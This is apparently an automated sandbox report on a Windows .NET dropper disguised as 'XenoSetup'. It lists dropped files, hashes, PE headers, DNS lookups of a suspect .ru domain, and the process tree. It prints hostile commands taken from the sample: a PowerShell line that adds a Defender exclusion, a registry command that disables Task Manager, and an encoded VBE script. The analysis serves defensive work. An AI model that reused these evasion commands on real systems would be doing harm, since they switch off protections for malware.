                                                                                    Preview:qV8TWdEKJFEN1SDF4eeMBMk6Q4GKUaylA9NbbqjlRwELKBaS0qncxPweuBCbX30tRcM2EmnO425PHZwOexUnwVyvMtqanHOX6V3rzhNNCZh4ThXUPx7jjM75obpV5NkxohSvfEZ7jGlWx3bpVVKzKoyuY7CX11RyzuQwOmzLY9AclkIv9AAjDumAtiXiBBFrywhDmpasg9bKnVIxzRY11rvEHQCpOQJW4SnyDEITjRDETcWYZksunO0HBd5WnuePzFQVrUtuIFRjoqup4oQohYtpcgwkJwqyxxOOMBqF08mi6RcVsQc9ezraWk3KhJlVYdv1bgd37LxjwLsKDb22UrT7Fx1lHfhrXQJdfl3LxjBTBIoK1sHGQsBrJxvno1vbnGMfBPpciqEvpA67JrtZYbaoPbTszPg5xkp55JImDohjoPCJ1ye7IVCMpiPk57nSKJ7EUAB9iGWu30A9YK0AvixchdPX3irGBPZfS8z0xeZB9STyiPMvGmhlVfg1unG9ZPsnberaV9NQIvcPKbzoW59ZsxJxb8FJYamtjpXDivaGZQckCRqTybndPT5nV39W4D1sItqeEvFkf3AcUivJRwV6wIdPutrowDMVYubTlMPCVC7WTcTwIzFIr559PauVEbycroDkHbiFgSluKH6RZ4f77EodybEKb484OfppZspqQAlYTLzIec5J51emAkvpXXnmUqgpbR2qPzq7dPJmm5q98z8XBCoy79S2X8EnpJqNkO3GKhJvaJDbqonesIoYmDtPgykeKg7cPdZu51Md33Yx60LsVj4gfRkgeokW7pk4L
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:MSVC .res
                                                                                    Category:dropped
                                                                                    Size (bytes):1224
                                                                                    Entropy (8bit):4.435108676655666
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                                    MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                                    SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                                    SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                                    SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                                    Malicious:false
                                                                                    Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4608
                                                                                    Entropy (8bit):3.9538320222830885
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:6upHPtVM7Jt8Bs3FJsdcV4MKe27GXfZuvqBHaOulajfqXSfbNtm:RPMPc+Vx9MGPZuvkEcjRzNt
                                                                                    MD5:5E77E0AA2AE8F53E6CAA28CC4FC4FEFF
                                                                                    SHA1:6A8B8AF20370F7E792AEB988E5A6E03DABDE52B6
                                                                                    SHA-256:335F0386170449733D373B4DB82B268EED6B295FF490312E3389CA582BE3BFE4
                                                                                    SHA-512:F78BCC6E9BEE523888E8BB1C2CE661B79F692EEDF355F39802F21D2CF6313473CB9EA4A3CCDDC698FC81E310C24D267F9E1BF06E62DAA5743EABC6200856695A
                                                                                    Malicious:true
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... .g.............................'... ...@....@.. ....................................@.................................P'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..(.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):237
                                                                                    Entropy (8bit):5.838308466940053
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Gz2wqK+NkLzWbHyrFnBaORbM5nCuxx/VuYlIs:GPMCzWLyhBaORbQCi/Vui3
                                                                                    MD5:851D51CDEE60A57D4AEF51EA7F466436
                                                                                    SHA1:34A13967E69D21091850D4F0DFFB2BCE88C80E0C
                                                                                    SHA-256:5D612089C06BBE2B32DE8BFCC3E0BA1E0EF2155CD6CDE83B280797C6061CA269
                                                                                    SHA-512:7FED60DA3ED3FF2A26B8B4CADF0CF6CD3E28259A4A7EC7E3BA97509FA47B7CA75753CA49EDF2F218AE323830977C2ECDFB2F05B6FA5DE303038C31012926E953
                                                                                    Malicious:false
                                                                                    Preview:#@~^1AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vF{!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z2KDDADK3..f^V&zzm*V8vHlBE\&m~i"Z.E\0]hO+ZSeD&h2;393K ;4nF9].c8mYEBPZ~P6l^d+/UIAAA==^#~@.
                                                                                    Process:C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):194
                                                                                    Entropy (8bit):5.3590465198197075
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:++GoBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKNbejZDzAXBFAXhJE1qwj:++GcStuH1jhRiI36BWsV8RwEsk2PA
                                                                                    MD5:69C0EDF85B6D3AB82C42E82EF04F50F7
                                                                                    SHA1:7ACB4D2454D9E04DB488C2EE4352CFECE1B8AE58
                                                                                    SHA-256:3041CC5E5C4251EA1EDDCCAA5D145446719D6E86DCFD3BC40BC23C80B3102EC2
                                                                                    SHA-512:04877F967609E6EFB4A8C4F99C4130B3894EB223F390D32C6E2248ABAF1BDFF71F539F122635F18FA432648B927CC597DD7BDAA52284824F8C57C7909F7DCA21
                                                                                    Malicious:false
                                                                                    Preview:%LSWXAH%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%YdnUMRjw%..%QowIrUfTNWDuGuv%"C:\portBrokerDll/DriverbrokerCrtDhcp.exe"%fNoj%
                                                                                    Process:C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                                    File Type:MS-DOS executable PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, MZ for MS-DOS
                                                                                    Category:dropped
                                                                                    Size (bytes):3420843
                                                                                    Entropy (8bit):7.992393726932408
                                                                                    Encrypted:true
                                                                                    SSDEEP:98304:2azh3piA6B85AR1lznmf/50X4ajKeSHqCwvHJ7pP2U:hzh3pgBzHZs50X5YM9
                                                                                    MD5:C9D8BCE0425ED81346B9A43F148D948B
                                                                                    SHA1:D3BCB8F02EF3732FFA70FC798CD4AD3D77BBBDE6
                                                                                    SHA-256:884DE0BA4D113A1674B112F76B7D6AF9BB11C562D6B58155E974E549694E0F58
                                                                                    SHA-512:60E0D21DB0518D66F4546DCEB978B15D2EB87347CC1676B7420EB2A6C4C1C6FA947D31AE8CB70CE880B76F931702AAAB51C46F559DD91A49C9A4BDC83B75368B
                                                                                    Malicious:true
                                                                                    Preview:MZ@.....................................!..L.!It's .NET EXE$@...PE..L....&.M............................^.... ...@....@.. ....................................@.....................................O....@.. ....................`....................................................... ............... ..H............text...d.... ...................... ..`.rsrc... ....@......................@..@.reloc.......`......................@..B...........................................................................v2.19@.......H.......d&...............................................................0............%..,....i-....+...........%..,....i-.....+...................XGR......8.........%.X.XG..........-.....c.........XG.b.X.......8....... ...._ .............:]........XJ..........-....c....X... ...._... .............-@....c....._..........-....X... ...._ ....X....a...+....._.X...+}....c....._....E............%...;...+V...?_.X..+K..X... ...._.AX....a..+3.. .?.._ A...X....X.+....XX... ...._ AD..X.
                                                                                    Process:C:\portBrokerDll\DriverbrokerCrtDhcp.exe
                                                                                    File Type:ASCII text, with very long lines (642), with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):642
                                                                                    Entropy (8bit):5.907897479167952
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:PR1iTX8iS55KadbYmSJ7Rs9stmoDzwBD3ujUW5TCSA8Zyf8v8vBDZt4SyBoF3h1n:p1eeDKadbrhKtDzwBD+j9TCSAn7hctB2
                                                                                    MD5:26F8C80A79A2F3A5A8E44FBECD04E3F5
                                                                                    SHA1:2A7865D6D7CD33D2943191CD1DC276A9FCA76D20
                                                                                    SHA-256:564AB8E251E976EC5FF1772FD5E7A6E6FBF6D4FAA1F100A20AE9BB564D906F66
                                                                                    SHA-512:494A64989318A0C802B3F3EFE8E161601F9E9B9F2946D14F2AC7C531D133A5C4BF18A7F660AF1E53A6287DDABB13060C29B69A64353BA9BCA92E0AF7372051AD
                                                                                    Malicious:false
                                                                                    Preview:SxAomICvfro6PEXVDXrLSnC2CGs6ybCnjneNTIt1NKYHRvbShtGZUyUpvIlfZG7DoBXlkJB5oz8IO4lRoaYFUnTvSzcLgNcHNVcPY0sYrLue0Ma0gU19r1tAsmSur0YbX053cV2yrAYI3z4GYloMVdZVmbhwh7q1xTG9QhYLbCRqdkH3rLVFLLF4akRAxGRuUhVjs501NcuTLt2BUoFVlkplOMiqPXXVvhW6OhKvVe2sbwsrrPqJA5Jt2uVgWJlzFYhoW5xwdTAHs6Kbd18ArOU0XmEeMoYL2CnCOEUvb3pr4BB5j3DfLlH1DqQu1Skz4zPpSINZgMixin6VkI4Sl39Q5w8ixk4JTzwEwWnbqn88CTSau4JtYSOBz8tgJpl6SZes01jOfcl74BOldhx2aKvBlvOymHSBBCqnzkj2V5O5qRHyuICl1tfHocHFmulXKj51Ukv385gf6zUUoaEeEqKShi9XddPkT0uHVPdJWJn6M9LyHxbMqHTeYnUwlYaep6LGFN8Y64H5DOFhXLQpCD3MgQts5ri8sIRQyFs3yCPwAXbKhwZaHuclC8jyePdPWIM57ztScW0AyHMJziLIRH18ppNzf3Zji9a1LfMrDG8v3cx4wa95EV7OROPSl3wi6R
                                                                                    Process:C:\Windows\System32\PING.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):502
                                                                                    Entropy (8bit):4.630609828667227
                                                                                    Encrypted:false
                                                                                    SSDEEP:12:P1I5pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:96dUOAokItULVDv
                                                                                    MD5:5ECAC607439DFAD1D6FFB340262F2796
                                                                                    SHA1:23C402AC6D0072B1DB1193FFA6D194A6B149ED61
                                                                                    SHA-256:2277F0CAE783E77060DF2754E67925EF3FDB406C93F3C0C0440FAE4E71BE690A
                                                                                    SHA-512:3B296215F323D75A37F617F4D4B5DCDA967D9C7F8E03465ADE60F78A25A7757E2C0815AFFF86705268A7098989B1AE878F8D04BB85F5BCB48A3BAD233E14CA9C
                                                                                    Malicious:false
                                                                                    Preview:..Pinging 579569 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Entropy (8bit):2.485330570646278
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                    • DOS Executable Generic (2002/1) 0.01%
                                                                                    File name:XenoSetup(2).exe.bin.exe
                                                                                    File size:16'777'216 bytes
                                                                                    MD5:5aa236eabe65a1e444f1eb31fb330eba
                                                                                    SHA1:b6a8d5362991511526ea5a2b86ad70f05e70652c
                                                                                    SHA256:3d79293d371d3393d83f0d6205c35263baa3618a6f3ccba4fcefbee999d4a714
                                                                                    SHA512:0ab8e56f1f8a09491d96416bdc2798874ff153ef56c6476cd9eda9fe0744e77f56132073524f1a2719a75d5dea8dcd5706ee1497867f8b3e62c9a52641afc0be
                                                                                    SSDEEP:98304:mjHzjFPB6n2gC9U851tTRIXDNgn+ojsSw9y4Q1vL3NPt:yHHFPgns9BvpyNgnNW4
                                                                                    TLSH:E0F633B0BFA85617C6B044B620A18C870491C1D43DDA2EFB5D4F92EFE4E6C88FB95B54
                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....'g.................~7..H........7.. ....7...@.. ....................... 8...........@................................
                                                                                    Icon Hash:08103062c4e02000
                                                                                    Entrypoint:0x779c0e
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x6727D91F [Sun Nov 3 20:12:15 2024 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:v4.0.30319
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                    Instruction
                                                                                    jmp dword ptr [00402000h]
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x379bc00x4b.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x37a0000x44f8.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3800000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x377c140x377e00e5536fe8dfa3f385b83562c11d510ae7unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x37a0000x44f80x4600b9aa86877000f5d8deb22a68676c4cccFalse0.9463727678571429data7.856068570153792IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x3800000xc0x2007a3b30e1bb1997461ada1562bbebe0bfFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_ICON0x37a1300x3f6cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.0006775067750677
                                                                                    RT_GROUP_ICON0x37e09c0x14data0.9
                                                                                    RT_VERSION0x37e0b00x25cdata0.4652317880794702
                                                                                    RT_MANIFEST0x37e30c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jan 13, 2025 13:33:05.125176907 CET6358153192.168.2.61.1.1.1
                                                                                    Jan 13, 2025 13:33:05.222934008 CET53635811.1.1.1192.168.2.6
                                                                                    Jan 13, 2025 13:33:42.405536890 CET5533553192.168.2.61.1.1.1
                                                                                    Jan 13, 2025 13:33:42.498272896 CET53553351.1.1.1192.168.2.6
                                                                                    Jan 13, 2025 13:33:50.441092968 CET6349853192.168.2.61.1.1.1
                                                                                    Jan 13, 2025 13:33:50.587368965 CET53634981.1.1.1192.168.2.6
                                                                                    Jan 13, 2025 13:33:58.513356924 CET5318653192.168.2.61.1.1.1
                                                                                    Jan 13, 2025 13:33:58.565604925 CET53531861.1.1.1192.168.2.6
                                                                                    Jan 13, 2025 13:34:07.096127033 CET5712353192.168.2.61.1.1.1
                                                                                    Jan 13, 2025 13:34:07.106787920 CET53571231.1.1.1192.168.2.6
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Jan 13, 2025 13:33:05.125176907 CET192.168.2.61.1.1.10x78a6Standard query (0)804052cm.nyashkoon.ruA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 13:33:42.405536890 CET192.168.2.61.1.1.10x8bc4Standard query (0)804052cm.nyashkoon.ruA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 13:33:50.441092968 CET192.168.2.61.1.1.10x4a6fStandard query (0)804052cm.nyashkoon.ruA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 13:33:58.513356924 CET192.168.2.61.1.1.10x137dStandard query (0)804052cm.nyashkoon.ruA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 13:34:07.096127033 CET192.168.2.61.1.1.10x74feStandard query (0)804052cm.nyashkoon.ruA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Jan 13, 2025 13:33:05.222934008 CET1.1.1.1192.168.2.60x78a6Name error (3)804052cm.nyashkoon.runonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 13:33:42.498272896 CET1.1.1.1192.168.2.60x8bc4Name error (3)804052cm.nyashkoon.runonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 13:33:50.587368965 CET1.1.1.1192.168.2.60x4a6fName error (3)804052cm.nyashkoon.runonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 13:33:58.565604925 CET1.1.1.1192.168.2.60x137dName error (3)804052cm.nyashkoon.runonenoneA (IP address)IN (0x0001)false
                                                                                    Jan 13, 2025 13:34:07.106787920 CET1.1.1.1192.168.2.60x74feName error (3)804052cm.nyashkoon.runonenoneA (IP address)IN (0x0001)false

                                                                                    Click to jump to process

                                                                                    Click to jump to process

                                                                                    Click to dive into process behavior distribution

                                                                                    Click to jump to process

                                                                                    Target ID:0
                                                                                    Start time:07:32:14
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\XenoSetup(2).exe.bin.exe"
                                                                                    Imagebase:0xad0000
                                                                                    File size:16'777'216 bytes
                                                                                    MD5 hash:5AA236EABE65A1E444F1EB31FB330EBA
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:07:32:17
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe'
                                                                                    Imagebase:0x7ff6e3d50000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:07:32:17
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff66e660000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:07:32:26
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
                                                                                    Imagebase:0xfe0000
                                                                                    File size:3'720'701 bytes
                                                                                    MD5 hash:BCF49847A74E554A807294D4F5ADFA62
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:07:32:27
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Users\user\AppData\Local\Temp\Xeno.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Xeno.exe"
                                                                                    Imagebase:0x7ff68d5e0000
                                                                                    File size:3'722'240 bytes
                                                                                    MD5 hash:056586E6A4D9B97C77FD606B2A63F604
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:8
                                                                                    Start time:07:32:27
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
                                                                                    Imagebase:0x2e0000
                                                                                    File size:147'456 bytes
                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:07:32:38
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\XenoSetup(1).exe"
                                                                                    Imagebase:0xfe0000
                                                                                    File size:3'720'701 bytes
                                                                                    MD5 hash:BCF49847A74E554A807294D4F5ADFA62
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:11
                                                                                    Start time:07:32:39
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\wscript.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\portBrokerDll\2jfojLJgRy.vbe"
                                                                                    Imagebase:0x2e0000
                                                                                    File size:147'456 bytes
                                                                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:12
                                                                                    Start time:07:32:44
                                                                                    Start date:13/01/2025
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
